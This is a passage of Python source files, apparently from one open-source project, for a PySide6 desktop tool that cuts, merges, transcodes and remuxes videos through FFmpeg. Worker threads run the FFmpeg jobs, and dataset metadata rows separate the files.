线程结束时删除线程对象 self.thread.finished.connect(self.on_thread_finished) # 线程结束时开启下一个线程 self.thread.start() # 开始线程 elif not os.path.isfile(self.merge_input_file): MessageBox("input错误", f"{self.merge_input_file}不存在!", parent=self).exec() self.on_thread_finished() # 进行下一个文件 elif not os.path.isfile(self.op_file): MessageBox("op错误", f"{self.op_file}不存在!", parent=self).exec() self.debugflag_of_filter_config = False self.i = 0 # 循环计数器清零 elif not os.path.isfile(self.ed_file): MessageBox("ed错误", f"{self.ed_file}不存在!", parent=self).exec() self.debugflag_of_filter_config = False self.i = 0 # 循环计数器清零 def merge_2_videos(self, is_op): if is_op: if os.path.isfile(self.merge_input_file) and os.path.isfile(self.op_file): self.VcodecpIFconsole.appendPlainText("执行合并任务,请稍等...") if self.VcodecpIFcheckBox_2.isChecked() and self.VcodecpIFcheckBox_3.isChecked(): resolution = self.VcodecpIFlineEdit.text().replace('x', ':') # 将resolution的x改为: self.worker = Worker('merge_video_two', ffpath.ffmpeg_path, ffpath.ffprobe_path, self.op_file, self.merge_output_file, self.merge_input_file, self.VcodecpIFplainTextEdit.toPlainText(), resolution, self.VcodecpIFlineEdit_2.text()) # 开启子进程 elif self.VcodecpIFcheckBox_2.isChecked() and not self.VcodecpIFcheckBox_3.isChecked(): resolution = self.VcodecpIFlineEdit.text().replace('x', ':') # 将resolution的x改为: self.worker = Worker('merge_video_two', ffpath.ffmpeg_path, ffpath.ffprobe_path, self.op_file, self.merge_output_file, self.merge_input_file, self.VcodecpIFplainTextEdit.toPlainText(), resolution) # 开启子进程 elif not self.VcodecpIFcheckBox_2.isChecked() and self.VcodecpIFcheckBox_3.isChecked(): resolution = '1920:1080' # 默认值 self.worker = Worker('merge_video_two', ffpath.ffmpeg_path, ffpath.ffprobe_path, self.op_file, self.merge_output_file, self.merge_input_file, self.VcodecpIFplainTextEdit.toPlainText(), resolution, self.VcodecpIFlineEdit_2.text()) # 开启子进程 elif not self.VcodecpIFcheckBox_2.isChecked() and not self.VcodecpIFcheckBox_3.isChecked(): resolution = '1920:1080' # 默认值 fps = 30 # 默认值 self.worker = Worker('merge_video_two', ffpath.ffmpeg_path, ffpath.ffprobe_path, self.op_file, self.merge_output_file, self.merge_input_file, self.VcodecpIFplainTextEdit.toPlainText(), resolution, fps) # 开启子进程 self.thread = WorkerThread(self.worker) self.thread.started.connect(lambda: self.VcodecpIFconsole.appendPlainText(f"{self.merge_input_file}开始视频合并")) # 线程开始时显示提示信息 logger.info(f"Merge video task started, input file: {self.merge_input_file}, output file: {self.merge_output_file}") self.thread.started.connect(self.on_thread_started()) # 线程开始时启动子进程 self.thread.finished.connect(lambda: self.VcodecpIFconsole.appendPlainText(f"{self.merge_input_file}完成视频合并")) # 线程结束时显示提示信息 self.thread.finished.connect(lambda: logger.info(f"Merge video task finished, input file: {self.merge_input_file}, output file: {self.merge_output_file}")) self.thread.finished.connect(self.worker.deleteLater) # 线程结束时删除worker对象 self.thread.finished.connect(self.thread.deleteLater) # 线程结束时删除线程对象 self.thread.finished.connect(self.on_thread_finished) # 线程结束时开启下一个线程 self.thread.start() # 开始线程 elif not os.path.isfile(self.merge_input_file): MessageBox("input错误", f"{self.merge_input_file}不存在!", parent=self).exec() self.on_thread_finished() # 进行下一个文件 elif not os.path.isfile(self.op_file): MessageBox("op错误", f"{self.op_file}不存在!", parent=self).exec() self.debugflag_of_filter_config = False self.i = 0 # 循环计数器清零 elif not is_op: if os.path.isfile(self.merge_input_file) and os.path.isfile(self.ed_file): self.VcodecpIFconsole.appendPlainText("执行合并任务,请稍等...") if self.VcodecpIFcheckBox_2.isChecked() and self.VcodecpIFcheckBox_3.isChecked(): resolution = self.VcodecpIFlineEdit.text().replace('x', ':') # 将resolution的x改为: self.worker = Worker('merge_video_two', ffpath.ffmpeg_path, ffpath.ffprobe_path, self.merge_input_file, self.merge_output_file, self.ed_file, self.VcodecpIFplainTextEdit.toPlainText(), resolution, self.VcodecpIFlineEdit_2.text()) # 开启子进程 elif self.VcodecpIFcheckBox_2.isChecked() and not self.VcodecpIFcheckBox_3.isChecked(): resolution = self.VcodecpIFlineEdit.text().replace('x', ':') # 将resolution的x改为: self.worker = Worker('merge_video_two', ffpath.ffmpeg_path, ffpath.ffprobe_path, self.merge_input_file, self.merge_output_file, self.ed_file, self.VcodecpIFplainTextEdit.toPlainText(), resolution) # 开启子进程 elif not self.VcodecpIFcheckBox_2.isChecked() and self.VcodecpIFcheckBox_3.isChecked(): resolution = '1920:1080' # 默认值 self.worker = Worker('merge_video_two', ffpath.ffmpeg_path, ffpath.ffprobe_path, self.merge_input_file, self.merge_output_file, self.ed_file, self.VcodecpIFplainTextEdit.toPlainText(), resolution, self.VcodecpIFlineEdit_2.text()) # 开启子进程 elif not self.VcodecpIFcheckBox_2.isChecked() and not self.VcodecpIFcheckBox_3.isChecked(): resolution = '1920:1080' # 默认值 fps = 30 # 默认值 self.worker = Worker('merge_video_two', ffpath.ffmpeg_path, ffpath.ffprobe_path, self.merge_input_file, self.merge_output_file, self.ed_file, self.VcodecpIFplainTextEdit.toPlainText(), resolution, fps) # 开启子进程 self.thread = WorkerThread(self.worker) self.thread.started.connect(lambda: self.VcodecpIFconsole.appendPlainText(f"{self.merge_input_file}开始视频合并")) # 线程开始时显示提示信息 logger.info(f"Merge video task started, input file: {self.merge_input_file}, output file: {self.merge_output_file}") self.thread.started.connect(self.on_thread_started()) # 线程开始时启动子进程 self.thread.finished.connect(lambda: self.VcodecpIFconsole.appendPlainText(f"{self.merge_input_file}完成视频合并")) # 线程结束时显示提示信息 self.thread.finished.connect(lambda: logger.info(f"Merge video task finished, input file: {self.merge_input_file}, output file: {self.merge_output_file}")) self.thread.finished.connect(self.worker.deleteLater) # 线程结束时删除worker对象 self.thread.finished.connect(self.thread.deleteLater) # 线程结束时删除线程对象 self.thread.finished.connect(self.on_thread_finished) # 线程结束时开启下一个线程 self.thread.start() # 开始线程 elif not os.path.isfile(self.merge_input_file): MessageBox("input错误", f"{self.merge_input_file}不存在!", parent=self).exec() self.on_thread_finished() # 进行下一个文件 elif not os.path.isfile(self.ed_file): MessageBox("ed错误", f"{self.ed_file}不存在!", parent=self).exec() self.debugflag_of_filter_config = False self.i = 0 # 循环计数器清零 def debug_of_filter_config(self): if self.VcodecpIFcheckBox_4.isChecked() and self.VcodecpIFcheckBox_merge.isChecked(): if self.VcodecpIFcheckBox_extract.isChecked(): MessageBox("警告", "请勿同时选择加速、切割选项和合并选项!", parent=self).exec() self.clear_filter_config() else: MessageBox("警告", "请勿同时选择加速和合并选项!", parent=self).exec() self.clear_filter_config() elif self.VcodecpIFcheckBox_4.isChecked(): if self.VcodecpIFcheckBox_extract.isChecked(): MessageBox("警告", "请勿同时选择滤镜选项!", parent=self).exec() self.clear_filter_config() else: self.debugflag_of_filter_config = True elif self.VcodecpIFcheckBox_merge.isChecked(): if self.VcodecpIFcheckBox_extract.isChecked(): MessageBox("警告", "请勿同时选择滤镜选项!", parent=self).exec() self.clear_filter_config() else: self.debugflag_of_filter_config = True elif self.VcodecpIFcheckBox_extract.isChecked() and self.VcodecpIFtimeEdit_3.text() == '0:00:00:000' and self.VcodecpIFtimeEdit_2.text() == '0:00:00:000': MessageBox("警告", "切割时长不能为零!", parent=self).exec() self.clear_filter_config() else: self.debugflag_of_filter_config = True def clear_filter_config(self): self.VcodecpIFcheckBox_4.setChecked(False) self.VcodecpIFdoubleSpinBox.setEnabled(False) self.VcodecpIFcheckBox_merge.setChecked(False) self.VcodecpIFcheckBox_extract.setChecked(False) self.VcodecpIFtimeEdit_3.setEnabled(False) self.VcodecpIFtimeEdit_2.setEnabled(False) self.op_file = '' self.ed_file = '' self.VcodecpIFpushButton_3.setText('选择片头') self.VcodecpIFpushButton_4.setText('选择片尾') # Encoding Config def encoding(self): self.debugflag_of_filter_config = False # 调试模式 self.debug_of_filter_config() if self.debugflag_of_filter_config: # 是否传入文件 # 如果输入文件和输出文件都存在,则执行转码任务 self.freeze_config('正在执行转码任务,请稍等...') if self.input_file_args != [] and self.output_file_args != []: while self.i < (len(self.input_file_args)): if self.is_paused: # 若暂停,则不进行循环 break self.simple_encoding() self.accelerated_encoding() self.extract_or_cut_video() self.merge_or_concat_video() else: self.i = 0 # 循环计数器清零 self.VcodecpIFconsole.appendPlainText("全部转码任务完成!") self.clear_input_file() self.unfreeze_config() # 如果输入文件存在,但输出文件不存在,则弹出提示框,ok进入选择,cancel退出 elif self.input_file_args != [] and self.output_file_args == []: warn = MessageBox("警告", "请先选择输出文件夹!", parent=self) if warn.exec(): self.select_output_folder() if_continue = MessageBox("提示", "是否继续执行?", parent=self) if if_continue.exec(): self.simple_encoding() self.accelerated_encoding() self.extract_or_cut_video() self.merge_or_concat_video() else: self.i = 0 # 循环计数器清零 self.unfreeze_config() # 如果输入文件不存在,则弹出提示框,ok退出,cancel进入选择 elif self.input_file_args == []: MessageBox("警告", "请先选择输入文件!", parent=self).exec() self.clear_input_file() self.unfreeze_config() def on_thread_started(self): self.is_paused = True # 开启暂停标志 logger.debug(f'线程创建,暂停循环,i={self.i}') def on_thread_finished(self): self.is_paused = False # 重置暂停标志 self.i = self.i + 1 # 开启下一个文件 logger.debug(f'{self.i-1}线程结束,开始循环,i={self.i}') self.encoding() # 开启下一个线程 def freeze_config(self, text=''): self.VcodecpIFlineEditVE.setEnabled(False) # 禁止修改视频编码器 self.VcodecpIFlineEditAE.setEnabled(False) # 禁止修改音频编码器 self.VcodecpIFcomboBox_2.setEnabled(False) # 禁止修改视频预设 self.VcodecpIFcomboBox_3.setEnabled(False) # 禁止修改音频预设 self.VcodecpIFspinBox.setEnabled(False) # 禁止修改视频码率 self.VcodecpIFspinBox_2.setEnabled(False) # 禁止修改视频品质 self.VcodecpIFcomboBox_5.setEnabled(False) # 禁止修改profile self.VcodecpIFdoubleSpinBox.setEnabled(False) # 禁止修改加速倍率 self.VcodecpIFpushBtn.setEnabled(False) # 禁止开始转码 self.VcodecpIFtimeEdit_3.setEnabled(False) # 禁止选择切割起始时间 self.VcodecpIFtimeEdit_2.setEnabled(False) # 禁止选择切割结束时间 self.VcodecpIFlineEdit.setEnabled(False) # 禁止修改分辨率 self.VcodecpIFlineEdit_2.setEnabled(False) # 禁止修改帧率 self.VcodecpIFcheckBox_3.setEnabled(False) # 禁止enable修改帧率 self.VcodecpIFcheckBox.setEnabled(False) # 禁止enable修改profile self.VcodecpIFcheckBox_2.setEnabled(False) # 禁止enable修改分辨率 self.VcodecpIFcheckBox_4.setEnabled(False) # 禁止enable加速转码 self.VcodecpIFcheckBox_merge.setEnabled(False) # 禁止enable合并转码 self.VcodecpIFradioButton.setEnabled(False) # 禁止enable切割模式 self.VcodecpIFradioButton_2.setEnabled(False) # 禁止enable切割模式 self.VcodecpIFClearFil.setEnabled(False) # 禁止清除输入文件 self.VcodecpIFpushButton_3.setEnabled(False) # 禁止选择开头文件 self.VcodecpIFpushButton_4.setEnabled(False) # 禁止选择结尾文件 self.VcodecpIFplainTextEdit.setEnabled(False) # 禁止自定义编码参数 self.VcodecpIFcheckBox_extract.setEnabled(False) # 禁止enable切割转码 self.VcodecpIFtFormat.setEnabled(False) # 禁止修改输出格式 logger.debug(f"Freeze config. {text}") # self.VcodecpIFconsole.appendPlainText("冻结配置") def unfreeze_config(self): self.VcodecpIFlineEditVE.setEnabled(True) # 解除禁止修改视频编码器 self.VcodecpIFlineEditAE.setEnabled(True) # 解除禁止修改音频编码器 self.VcodecpIFcomboBox_2.setEnabled(True) # 解除禁止修改视频预设 self.VcodecpIFcomboBox_3.setEnabled(True) # 解除禁止修改音频预设 self.VcodecpIFspinBox.setEnabled(True) # 解除禁止修改视频码率 self.VcodecpIFspinBox_2.setEnabled(True) # 解除禁止修改视频品质 self.VcodecpIFpushBtn.setEnabled(True) # 解除禁止开始转码 self.VcodecpIFcheckBox_3.setEnabled(True) # 解除禁止enable修改帧率 self.VcodecpIFcheckBox.setEnabled(True) # 解除禁止enable修改profile self.VcodecpIFcheckBox_2.setEnabled(False) # 解除禁止enable修改分辨率 self.VcodecpIFcheckBox_4.setEnabled(True) # 解除禁止enable加速转码 self.VcodecpIFcheckBox_merge.setEnabled(True) # 解除禁止enable合并转码 self.VcodecpIFradioButton.setEnabled(True) # 解除禁止enable切割模式 self.VcodecpIFradioButton_2.setEnabled(True) # 解除禁止enable切割模式 self.VcodecpIFClearFil.setEnabled(True) # 解除禁止清除输入文件 self.VcodecpIFplainTextEdit.setEnabled(True) # 禁止自定义编码参数 self.VcodecpIFcheckBox_extract.setEnabled(True) # 解除禁止enable切割转码 self.VcodecpIFtFormat.setEnabled(True) # 解除禁止修改输出格式 if self.VcodecpIFcheckBox_2.isChecked(): # 如果修改分辨率,则解除禁止修改分辨率 self.VcodecpIFlineEdit.setEnabled(True) # 解除禁止修改分辨率 if self.VcodecpIFcheckBox_3.isChecked(): self.VcodecpIFlineEdit_2.setEnabled(True) # 解除禁止修改帧率 if self.VcodecpIFcheckBox.isChecked(): self.VcodecpIFcomboBox_5.setEnabled(True) # 解除禁止修改profile if self.VcodecpIFcheckBox_4.isChecked(): self.VcodecpIFdoubleSpinBox.setEnabled(True) # 解除禁止修改加速倍率 if self.VcodecpIFcheckBox_extract.isChecked(): self.VcodecpIFtimeEdit_3.setEnabled(True) # 解除禁止选择切割结束时间 self.VcodecpIFtimeEdit_2.setEnabled(True) # 解除禁止选择切割结束时间 if self.VcodecpIFcheckBox_merge.isChecked(): self.VcodecpIFpushButton_3.setEnabled(True) # 解除禁止选择开头文件 self.VcodecpIFpushButton_4.setEnabled(True) # 解除禁止选择结尾文件 logger.debug("Unfreeze config.") # self.VcodecpIFconsole.appendPlainText("解除冻结配置") def stop(self): if self.worker._started_flag: self.is_paused = True # 开启暂停标志 logger.warning(f'终止循环,i={self.i}') self.i = 2600000000 # 设定一个很大的数值,使线程结束 self.worker.interrupt() # 停止worker if self.worker.is_interrupted: # 停止worker self.thread.wait() # 等待线程结束 self.worker.deleteLater() # 删除worker对象 self.thread.deleteLater() # 删除线程对象 self._started_flag = False self.is_paused = False # 重置暂停标志 self.i = 0 # 循环计数器清零 self.unfreeze_config() MessageBox("警告", "转码任务已暂停!软件即将退出,请重新启动!", parent=self).exec()
54,329
Python
.py
715
56.753846
264
0.666542
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,450
ffmpegApi.py
wish2333_VideoExtractAndConcat/modules/ffmpegApi.py
# ffmpegApi.py # 实现了FFmpeg的命令行接口,可以对视频进行各种操作,如截取、合并、转码、截图等。 import subprocess import os from modules.logger_config import logger import time import threading from modules.config import ffpath class FFmpeg: # 初始化函数,用于初始化实例的ffmpeg_path属性 def __init__(self, ffmpeg_path=ffpath.ffmpeg_path, ffprobe_path=ffpath.ffprobe_path, interrupt_flag=False, # 中断标志 callback=None, # 回调函数 ): self.ffmpeg_path = ffmpeg_path self.ffprobe_path = ffprobe_path self.interrupt_flag = interrupt_flag self.callback = callback def update_interrupt_flag(self, flag=True): self.interrupt_flag = flag def check_interrupt_flag(self): while not self.interrupt_flag: # logger.info("ffmpegapi守卫线程运行中") time.sleep(1) logger.debug("ffmpegapi检测到中断请求") self.interrupt_run() def interrupt_run(self): if self.interrupt_flag: # 如果收到中断信号,则终止FFmpeg进程 logger.debug("尝试终止FFmpeg进程") self.p.terminate() self.p.wait(timeout=5) if self.p.poll() is None: self.p.kill() if callable(self.callback): self.callback() self.interrupt_flag = False logger.debug("FFmpeg进程强制终止") logger.debug("ffmpegapi中断请求已处理") # 定义run方法来执行FFmpeg命令 def run(self, cmd ): t = None # 守卫线程预留在try之外 try: cmd = [self.ffmpeg_path] + cmd cmd_str = ' '.join(cmd) logger.info(f"尝试执行:{cmd_str}") # 创建线程运行FFmpeg命令 self.p = subprocess.Popen( cmd_str, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding='utf-8', text=True ) # 创建线程检测中断信号 t = threading.Thread(target=self.check_interrupt_flag) t.daemon = True t.start() if t.is_alive(): logger.debug('启动守卫线程成功') else: logger.error('启动守卫线程失败') # 实时输出FFmpeg命令的执行信息 while True: line = self.p.stdout.readline() if not line: # 如果没有更多输出,检查进程是否已经结束 if self.p.poll() is not None: break else: continue logger.debug(line.strip()) # 打印输出信息 print(line.strip(), end='\r') # 打印输出信息 # 如果出错,获取错误信息 out, err = self.p.communicate() if self.p.returncode != 0: logger.error(f"命令执行失败,错误信息:{err}") raise Exception(err) except FileNotFoundError as fnf_error: logger.error(f"找不到ffmpeg或ffprobe命令,请检查ffmpeg_path和ffprobe_path是否正确配置。") raise fnf_error except PermissionError as p_error: logger.error(f"ffmpeg或ffprobe命令没有执行权限,请检查ffmpeg_path和ffprobe_path是否正确配置。") raise p_error except Exception as e: logger.error(f"执行FFmpeg命令失败:{e}") raise e finally: logger.info("FFmpeg命令执行完成") if t and t.is_alive(): self.interrupt_flag = True # 设置中断标志 t.join() self.interrupt_flag = False # 重置中断标志 logger.debug("守卫线程退出") # 输出ffmpeg的版本信息 def version(self): return self.run(['-version']) # 获取视频时长 def get_duration(self, input_file ): cmd1 = [ self.ffprobe_path, '-v', 'error', '-show_entries', 'format=duration', '-of', 'default=noprint_wrappers=1:nokey=1', input_file ] logger.debug("执行:" + ' '.join(cmd1)) result = subprocess.run(cmd1, capture_output=True, text=True) # 检查输出是否为空 stdout = result.stdout.strip() if not stdout: logger.error("ffprobe 输出为空,无法获取视频持续时间") return None # 或者返回一个默认值 try: duration = float(stdout) logger.debug("视频总秒数为:" + str(duration)) return duration except ValueError as e: logger.error("转换视频持续时间为浮点数时出错:", str(e)) raise e # 或者返回一个错误信息 # 计算时间字符串 def time_calculate(self, duration, end): logger.debug(end) # 转换为浮点数进行计算 hours, minutes, seconds, milliseconds = end.split(':') hours = float(hours) minutes = float(minutes) end_float = hours * 3600 + minutes * 60 + float(seconds) end_float += float(milliseconds) / 1000 end_time_float = duration - end_float logger.debug("结束时间点为:", str(end_time_float)) # 浮点数结果转换为字符串格式 m, s = divmod(end_time_float, 60) h, m = divmod(m, 60) end_time = "%02d:%02d:%06.3f" % (h, m, s) logger.debug("结束时间点为:", end_time) return end_time # 截取视频(输入文件夹) def extract_video(self, input_folder, start_time, end, output_folder, encoder='-c:v copy -c:a copy', overwrite='-y' ): # 遍历文件夹中的所有mp4视频文件 for file in os.listdir(input_folder): if file.endswith('.mp4'): input_file = os.path.join(input_folder, file) # 检测输出文件夹是否存在,不存在则创建 if not os.path.exists(output_folder): os.makedirs(output_folder) output_file = os.path.join(output_folder, file) # 读取视频的总时长 duration = self.get_duration(input_file) # 将end时间转换为秒数浮点数计算后返回结束时间字符串 end_time = self.time_calculate(duration, end) # 调用ffmpeg命令行工具,对视频进行截取 cmd = [ '-hide_banner', overwrite, '-ss', start_time, '-to', end_time, '-accurate_seek', '-i', f'"{input_file}"', encoder, f'"{output_file}"'] # 打印最终输入命令行的cmd指令,从列表转换为字符串 # logger.info("执行:" + r'Q:\Git\FFmpeg-python\02FFmpegTest\FFmpeg\bin\ffmpeg.exe ' + ' '.join(cmd)) self.run(cmd) # logger.debug(file + '视频截取完成') else: logger.info(file + '不是mp4文件,跳过') # 截取视频(输入文件) def extract_video_single(self, input_file, output_file, start_time, end, encoder='-c:v copy -c:a copy', overwrite='-y' ): start_time = start_time[:7] + '.' + start_time[8:] # 转换为ffmpeg格式的时间格式 # 读取视频的总时长 duration = self.get_duration(input_file) # 将end时间转换为秒数浮点数计算后返回结束时间字符串 end_time = self.time_calculate(duration, end) # 调用ffmpeg命令行工具,对视频进行截取 cmd = [ '-hide_banner', overwrite, '-ss', start_time, '-to', end_time, '-accurate_seek', '-i', f'"{input_file}"', encoder, f'"{output_file}"'] # 打印最终输入命令行的cmd指令,从列表转换为字符串 # logger.info("执行:" + r'Q:\Git\FFmpeg-python\02FFmpegTest\FFmpeg\bin\ffmpeg.exe ' + ' '.join(cmd)) self.run(cmd) file = os.path.basename(input_file) # logger.debug(file + '视频截取完成') def cut_video(self, input_file, output_file, start_time, end_time, encoder='-c:v copy -c:a copy', overwrite='-y' ): start_time = start_time[:7] + '.' + start_time[8:] # 转换为ffmpeg格式的时间格式 end_time = end_time[:7] + '.' + end_time[8:] # 转换为ffmpeg格式的时间格式 cmd = [ '-hide_banner', overwrite, '-ss', start_time, '-to', end_time, '-accurate_seek', '-i', f'"{input_file}"', encoder, f'"{output_file}"'] self.run(cmd) file = os.path.basename(input_file) logger.info(file + '视频截取完成') # 合并视频(输入文件夹) def merge_video_folder(self, input_folder, input_file1, input_file2, output_folder, encoder='-c:v libx264 -preset veryfast -crf 23 -c:a aac -b:a 192k -ar 44100 -ac 2', overwrite='-y'): # 遍历文件夹中的所有mp4视频文件 for file in os.listdir(input_folder): if file.endswith('.mp4'): input_file = os.path.join(input_folder, file) # 检测输出文件夹是否存在,不存在则创建 if not os.path.exists(output_folder): os.makedirs(output_folder) output_file = os.path.join(output_folder, file) # 调用ffmpeg命令行工具,对视频进行合并 cmd = [ '-hide_banner', overwrite, '-i', f'"{input_file1}"', '-i', f'"{input_file}"', '-i', f'"{input_file2}"', '-filter_complex', '"[0:v]fps=30,scale=1280:720,setsar=1[v0];[1:v]fps=30,scale=1280:720,setsar=1[v1];[2:v]fps=30,scale=1280:720,setsar=1[v2];[0:a]aformat=sample_rates=44100:channel_layouts=stereo[a0];[1:a]aformat=sample_rates=44100:channel_layouts=stereo[a1];[2:a]aformat=sample_rates=44100:channel_layouts=stereo[a2];[v0][a0][v1][a1][v2][a2]concat=n=3:v=1:a=1[vout][aout]" -map "[vout]" -map "[aout]"', encoder, f'"{output_file}"'] # 打印最终输入命令行的cmd指令,从列表转换为字符串 # logger.info("执行:" + r'Q:\Git\FFmpeg-python\02FFmpegTest\FFmpeg\bin\ffmpeg.exe ' + ' '.join(cmd)) self.run(cmd) # logger.info(file + '视频合并完成') else: logger.info(file + '不是mp4文件,跳过') # 合并视频(输入3个文件) def merge_video(self, input_file, output_file, input_file1, input_file2, encoder='-c:v libx264 -preset veryfast -crf 23 -c:a aac -b:a 192k -ar 44100 -ac 2', resolution='1920:1080', fps='30', overwrite='-y' ): cmd = [ '-hide_banner', overwrite, '-i', f'"{input_file1}"', '-i', f'"{input_file}"', '-i', f'"{input_file2}"', '-filter_complex', f'"[0:v]fps={fps},scale={resolution},setsar=1[v0];[1:v]fps={fps},scale={resolution},setsar=1[v1];[2:v]fps={fps},scale={resolution},setsar=1[v2];[0:a]aformat=sample_rates=44100:channel_layouts=stereo[a0];[1:a]aformat=sample_rates=44100:channel_layouts=stereo[a1];[2:a]aformat=sample_rates=44100:channel_layouts=stereo[a2];[v0][a0][v1][a1][v2][a2]concat=n=3:v=1:a=1[vout][aout]" -map "[vout]" -map "[aout]"', encoder, f'"{output_file}"'] # 打印最终输入命令行的cmd指令,从列表转换为字符串 # logger.info("执行:" + r'Q:\Git\FFmpeg-python\02FFmpegTest\FFmpeg\bin\ffmpeg.exe ' + ' '.join(cmd)) self.run(cmd) file = os.path.basename(input_file) # logger.info(file + '视频截取完成') # 合并视频(输入2个文件) def merge_video_two(self, op_file, output_file, ed_file, encoder='-c:v libx264 -preset veryfast -crf 23 -c:a aac -b:a 192k -ar 44100 -ac 2', resolution='1920:1080', fps='30', overwrite='-y' ): cmd = [ '-hide_banner', overwrite, '-i', f'"{op_file}"', '-i', f'"{ed_file}"', '-filter_complex', f'"[0:v]fps={fps},scale={resolution},setsar=1[v0];[1:v]fps={fps},scale={resolution},setsar=1[v1];[0:a]aformat=sample_rates=44100:channel_layouts=stereo[a0];[1:a]aformat=sample_rates=44100:channel_layouts=stereo[a1];[v0][a0][v1][a1]concat=n=2:v=1:a=1[vout][aout]" -map "[vout]" -map "[aout]"', encoder, f'"{output_file}"'] # 打印最终输入命令行的cmd指令,从列表转换为字符串 # logger.info("执行:" + r'Q:\Git\FFmpeg-python\02FFmpegTest\FFmpeg\bin\ffmpeg.exe ' + ' '.join(cmd)) self.run(cmd) file = os.path.basename(output_file) # logger.info(file + '视频合并完成') # 合并视频(concat) # def concat_video(self, # input_file1, # input_file2, # output_file, # 音频转码 def audio_encode(self, input_file, output_file, encoder = r'-acodec aac -b:a 128k ', overwrite='-y'): cmd = [ '-hide_banner', overwrite, '-i', f'"{input_file}"', encoder, f'"{output_file}"' ] self.run(cmd) # file = os.path.basename(input_file) # logger.info(file + '音频转码完成') # 视频转码 def video_encode(self, input_file, output_file, encoder = r'-vcodec libx264 -preset medium -crf 23 -acodec aac -b:a 128k', overwrite='-y'): cmd = [ '-hide_banner', overwrite, '-i', f'"{input_file}"', encoder, f'"{output_file}"' ] self.run(cmd) # file = os.path.basename(input_file) # logger.info(file + '视频转码完成') # 加速转码 def accelerated_encode(self, input_file, output_file, rate=1, encoder = r'-vcodec libx264 -preset medium -crf 23 -acodec aac -b:a 128k', overwrite='-y'): cmd = [ '-hide_banner', overwrite, '-i', f'"{input_file}"', f'-filter_complex "[0:v]setpts=PTS/{rate}[v];[0:a]atempo={rate}[a]" -map "[v]" -map "[a]"', encoder, f'"{output_file}"' ] self.run(cmd) # file = os.path.basename(input_file) # logger.info(file + '视频加速完成') # 音视频字幕混合 def avsmix_encode(self, input_file, output_file, audio, subtitle, encoder = r'-vcodec libx264 -preset medium -crf 23 -acodec aac -b:a 128k', overwrite='-y'): cmd = [ '-hide_banner', overwrite, '-i', f'"{input_file}"', audio, subtitle, encoder, f'"{output_file}"' ] self.run(cmd) # file = os.path.basename(input_file) # logger.info(file + '视频字幕混合完成') # 视频转封装 def remux_video(self, input_file, output_file, format='mp4', overwrite='-y' ): cmd = [ '-hide_banner', overwrite, '-i', f'"{input_file}"', r'-c copy', f'"{output_file}.{format}"' ] self.run(cmd) # file = os.path.basename(input_file) # logger.info(file + '视频转封装完成') # 常规视频提取 def norEx_video(self, input_file, output_file, param, overwrite='-y' ): if param == 'V': cmd = [ '-hide_banner', overwrite, '-i', f'"{input_file}"', r'-c:v copy', '-map 0:v:0', f'"{output_file}"' ]
16,894
Python
.py
420
24.354762
419
0.507869
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,451
VfilterInterface.py
wish2333_VideoExtractAndConcat/modules/VfilterInterface.py
import os from PySide6.QtCore import Qt, QThread, Signal, QObject, QTime from PySide6.QtGui import QPixmap, QPainter, QColor from PySide6.QtWidgets import QWidget, QFileDialog, QMessageBox, QListWidgetItem from qfluentwidgets import MessageBox from modules.config import ffpath from modules.ffmpegApi import FFmpeg from modules.ffmpegApi_filter import FFmpegFilter from modules.Ui_VfilterInterface import Ui_VfilterInterface from modules.logger_config import logger # 继承自QObject的子类,用于执行后台任务的子类 class Worker(QObject): started = Signal() # 任务开始时发出的信号 finished = Signal() # 任务完成时发出的信号 interrupted = Signal() # 任务被中断时发出的信号 callback = Signal() # 任务执行过程中输出的信号 def __init__(self, task_type, ffmpeg_path, ffprobe_path, *task_args, callback=None): super().__init__() self.task_type = task_type self.ffmpeg_path = ffmpeg_path self.ffprobe_path = ffprobe_path self.task_args = task_args logger.info(f"Simple {task_type} task started") self._started_flag = False # 任务是否开始的标志 self._interrupted_flag = False # 任务是否被中断的标志 self.callback = callback # 任务执行过程中输出的回调函数 self.is_interrupted = False # 任务被中断时的回调函数 def interrupt(self): self._interrupted_flag = True # 设置任务被中断的标志 self.ffmpeg_instance.update_interrupt_flag(self._interrupted_flag) # 更新全局中断标志 logger.info('中止信号已发出') def interrupted_callback(self): logger.info('中止信号回调,worker任务被中断') self.is_interrupted = True # 设置任务被中断的标志 if callable(self.callback): self.callback() self.interrupted.emit() # 发出中断信号 def run_ffmpeg_task(self): self._started_flag = True # 任务开始的标志 self.started.emit() # 任务开始,发出信号 if self.task_type == 'run': self.run_video(*self.task_args) elif self.task_type == 'norEx_video': self.norEx_video(*self.task_args) elif self.task_type == 'mulEx_video': self.mulEx_video(*self.task_args) else: logger.error(f"Unknown task type: {self.task_type}") self.finished.emit() # 任务完成,发出信号 # 在这里可以添加更多任务类型的判断和调用 def run_video(self, cmd): self.ffmpeg_instance = FFmpegFilter(self.ffmpeg_path, interrupt_flag=self._interrupted_flag, callback=self.interrupted_callback) # 实例化FFmpegApi self.ffmpeg_instance.run(cmd) def norEx_video(self, input, output, action, overwrite='-y'): self.ffmpeg_instance = FFmpeg(self.ffmpeg_path, interrupt_flag=self._interrupted_flag, callback=self.interrupted_callback) # 实例化FFmpegApi self.ffmpeg_instance.norEx_video(input, output, action, overwrite) def mulEx_video(self, input, output, action, overwrite='-y'): self.ffmpeg_instance = FFmpeg(self.ffmpeg_path, interrupt_flag=self._interrupted_flag, callback=self.interrupted_callback) # 实例化FFmpegApi self.ffmpeg_instance.mulEx_video(input, output, action, overwrite) # 继承自QThread的子类,用于后台执行任务的线程类 class WorkerThread(QThread): def __init__(self, worker): super().__init__() self.worker = worker self.worker.interrupted.connect(self.handle_interrupt) # 任务被中断时停止线程 def run(self): try: self.worker.run_ffmpeg_task() except Exception as e: logger.error(f"Error occurred while running {self.worker.task_type} task: {e}") def handle_interrupt(self): self.quit() # 停止线程 class VfilterInterface(QWidget, Ui_VfilterInterface): def __init__(self, parent=None): super().__init__(parent=parent) self.setupUi(self) self.init_variables() self.init_action() self.init_print() self.bind() # 必须给子界面设置全局唯一的对象名 # Init_variables def init_variables(self): # file self.input_file_args = [] self.output_file_args = [] # 循环 self.i = 0 self.is_paused = False # rotate self.image_ = ['', ''] # Init_action def init_action(self): self.rotate_dict = {'横竖屏转换':'','横屏转竖屏-背景图片': 'H2V-I', '横屏转竖屏-背景原片': 'H2V-T', '横屏转竖屏-背景黑色': 'H2V-B', 